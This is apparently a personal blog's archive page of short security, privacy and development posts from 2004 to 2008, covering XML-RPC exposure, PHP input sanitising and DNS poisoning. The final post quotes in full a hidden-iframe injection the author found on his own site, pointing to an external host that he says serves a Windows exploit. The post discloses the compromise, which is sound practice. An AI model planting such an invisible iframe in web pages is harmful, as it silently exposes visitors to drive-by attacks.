One Interface, Please

June 24, 2008 – 6:00 pm

To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off XML-RPC and AtomPUB interfaces by default.
MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause:
If your web service only provides one, first-class API through which all access flows, then you’ve only got one point to secure, [...]

More like this: , , , | Posted under programming, weblogs | Comments (0)

Can you trust document.location?

January 20, 2008 – 2:43 pm

Maybe JavaScript needs a same-origin rule for document.location. [ via Simon Willison ]

More like this: , | Posted under linklist, programming | Comments (0)

I thought “know your customer” meant…

January 11, 2007 – 9:23 pm

Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business.
Blue Moon Fiber Arts, a small West Cost company, runs a ’sock club’ service: a yarn of the month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. And [...]

More like this: , | Posted under Uncategorized | Comments (0)

Cross Talk

October 31, 2006 – 11:34 pm

Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft.
I’ve been reading both specifications. My notes below.
Cross Document Messages
In the WHAT WG model, documents can implement postMessage().
A receiving document (in another window or iframe) receives a message event, and will need to implement a [...]

More like this: , | Posted under Uncategorized | Comments (0)

Drive Slagging

June 8, 2006 – 9:06 am

[ via Bill Bumgarner ] Given the current Federal passion for grabbing every trace of data we generate, I predict making a HDD unreadable will become a crime.

More like this: | Posted under culture, linklist | Comments Off

An update of the old spying joke.

May 13, 2006 – 12:57 pm

Bruce Schneier: The NSA would like to remind everyone to call their mother’s [phone] this Sunday. They need to calibrate their system.

More like this: | Posted under commonplaces, culture, linklist | Comments Off

Camilla Paglia’s not a Security Expert

May 7, 2006 – 1:11 pm

Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy?
Neither kinky boots, nor security boasts excuse assault.

More like this: , | Posted under Uncategorized | Comments (1)

A UI WTF moment

October 20, 2005 – 11:12 pm

Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message:

At least it’s one less thing I need to remember.

More like this: , | Posted under humor | Comments Off

The content-addressable internet

October 16, 2005 – 7:02 pm

Brad Fitzpatrick endorses naming patches/installers with their digest value so you can search for patch “55820ee2f8c767a2833b21bd365e5753f50bd8ce”, download the file, compute the digest, and confirm you have the right files.

More like this: | Posted under linklist, software-development | Comments Off

Terror in the Knitting Skies

October 5, 2005 – 8:29 pm

Cynthia passed along the Yarn Harlot’s airplane misadventure: a businessman seated next to her decided her knitting needles were a threat (even though Transportation Safety Agency rules allow them onboard.)

More like this: | Posted under linklist | Comments Off

Check the serial numbers instead.

September 21, 2005 – 11:25 pm

Adam: It’s easier to check ID than it is to make a judgment call. The consequences illustrated by a scene from a popular film.

More like this: | Posted under culture, media | Comments Off

Untainting in PHP

September 20, 2005 – 12:53 am

Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.)
He showed off something I had not noticed before. In htmlentities() you can declare an encoding.
Shiflett has a straightforward approach to untainting user input:

$html = array();

$html['variable'] = htmlentities($_GET['variable'],ENT_QUOTES,”utf-8″);

/* Code using $html */

You could leverage [...]

More like this: , | Posted under software-development | Comments Off

More Development Links

September 13, 2005 – 12:24 am

Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget.
Chris Shiflet finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team.
Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned off.
The list [...]

More like this: , , , , | Posted under software-development | Comments Off

DNS Poisoning, Click Farming, and Poorly Specified Contracts

April 6, 2005 – 12:00 am

An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine.
A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession.
Well, for one thing, I could had told you that [...]

More like this: , , , | Posted under Uncategorized | Comments Off

Compromised

December 7, 2004 – 12:00 am

Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page.
<div style=”visibility: hidden; position: absolute; left: 1; top: 1″><iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>
The hidden iFrame loads a Windows exploit.
I have it removed, for the time being.
I don’t know how long it’s been [...]

More like this: , , | Posted under Uncategorized | Comments Off